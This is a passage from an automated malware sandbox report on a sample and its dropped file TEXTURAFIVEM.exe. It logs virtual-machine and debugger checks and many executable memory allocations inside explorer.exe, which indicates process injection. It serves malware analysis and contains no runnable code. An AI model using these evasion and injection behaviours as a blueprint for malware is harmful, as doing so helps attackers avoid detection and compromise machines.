            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 922337203685477
            Source: WerFault.exe, 00000025.00000002.629394673.000000000518D000.00000004.00000001.sdmpBinary or memory string: <arg nm="syspro" val="VMware7,1" />
            Source: explorer.exe, 00000002.00000000.358980773.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000002.00000000.358937907.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000002.00000000.354523818.0000000005D50000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.586599834.0000000005470000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.595640630.0000000005800000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.606719999.0000000004D50000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.631104983.0000000005750000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: WerFault.exe, 00000025.00000002.629394673.000000000518D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
            Source: explorer.exe, 00000002.00000000.355181915.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmpBinary or memory string: VBoxService.exeS3
            Source: WerFault.exe, 0000001C.00000003.566918702.0000000004FAB000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.593349263.000000000507A000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.601174434.0000000000AD8000.00000004.00000020.sdmp, WerFault.exe, 00000025.00000002.628768421.0000000005068000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: WerFault.exe, 00000023.00000002.604686381.0000000004A50000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW(X
            Source: explorer.exe, 00000002.00000000.354523818.0000000005D50000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.586599834.0000000005470000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.595640630.0000000005800000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.606719999.0000000004D50000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.631104983.0000000005750000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: WerFault.exe, 0000001C.00000003.561731447.0000000004FCC000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.585462886.000000000519D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmpBinary or memory string: VBoxService.exe
            Source: explorer.exe, 00000002.00000000.355181915.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.358937907.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 0000001E.00000002.612425075.0000000003A72000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
            Source: explorer.exe, 00000002.00000000.358728033.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: explorer.exe, 00000002.00000000.354523818.0000000005D50000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.586599834.0000000005470000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.595640630.0000000005800000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.606719999.0000000004D50000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.631104983.0000000005750000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: WerFault.exe, 00000025.00000002.630589777.00000000055E0000.00000004.00000001.sdmpBinary or memory string: VMware7,1(
            Source: WerFault.exe, 00000025.00000002.621694558.000000000360B000.00000004.00000040.sdmpBinary or memory string: VMware, Inc.zpL
            Source: explorer.exe, 00000002.00000000.358728033.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: WerFault.exe, 00000025.00000002.629394673.000000000518D000.00000004.00000001.sdmpBinary or memory string: <arg nm="sysmfg" val="VMware, Inc." />
            Source: explorer.exe, 00000002.00000000.358980773.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
            Source: explorer.exe, 00000002.00000000.354523818.0000000005D50000.00000002.00000001.sdmp, WerFault.exe, 0000001C.00000002.586599834.0000000005470000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.595640630.0000000005800000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.606719999.0000000004D50000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.631104983.0000000005750000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: explorer.exe, 00000002.00000002.610418959.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: C:\Windows\install\TEXTURAFIVEM.exeFile opened: NTICE
            Source: C:\Windows\install\TEXTURAFIVEM.exeFile opened: SICE
            Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00455C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00455C10
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004056DC mov eax, dword ptr fs:[00000030h]1_2_004056DC
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00405684 mov eax, dword ptr fs:[00000030h]1_2_00405684
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00405770 mov eax, dword ptr fs:[00000030h]1_2_00405770
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_004056DC mov eax, dword ptr fs:[00000030h]4_2_004056DC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00405684 mov eax, dword ptr fs:[00000030h]4_2_00405684
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00405770 mov eax, dword ptr fs:[00000030h]4_2_00405770
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_004056DC mov eax, dword ptr fs:[00000030h]5_2_004056DC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00405684 mov eax, dword ptr fs:[00000030h]5_2_00405684
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00405770 mov eax, dword ptr fs:[00000030h]5_2_00405770
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_004056DC mov eax, dword ptr fs:[00000030h]9_2_004056DC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00405684 mov eax, dword ptr fs:[00000030h]9_2_00405684
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00405770 mov eax, dword ptr fs:[00000030h]9_2_00405770
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_004032F5 GetProcessHeap,GetCurrentThreadId,1_2_004032F5
            Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Allocates memory in foreign processesShow sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 24010000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 2990000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4C00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4C20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4CB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4D40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 61B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 61F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 6280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 62A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 62C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 6550000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 6570000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 6590000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 65C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7450000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7480000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 64E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 6500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 6520000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 6540000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7620000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7640000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7670000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 76A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 76D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7420000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7700000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7730000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7760000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 77B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 77E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7810000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7470000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7840000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7870000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 78A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 78E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7910000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7940000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7970000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 79A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 78B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 75A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 75D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7600000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 79C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7D20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7D70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7EC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7F00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: A940000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: A970000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: D230000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: D270000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E170000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E530000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E570000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E6B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E6F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E730000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E770000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E7B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E7F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E830000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: E870000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EA30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EA70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EAB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EAF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EB30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EC00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EBB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EB90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: EC60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F080000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F0E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F520000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F070000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: ECF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 2980000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FAC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FB00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FB10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F0B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FBB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FC30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FCD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FD10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F030000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FD50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: FD90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F560000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F5A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F5E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F620000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F660000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F6A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F720000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F760000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F7A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F7E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F820000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: F860000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 29A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4E50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4E90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 4EC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7230000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 7290000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 72C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: 72F0000 protect: page execute and read and writeJump to behavior
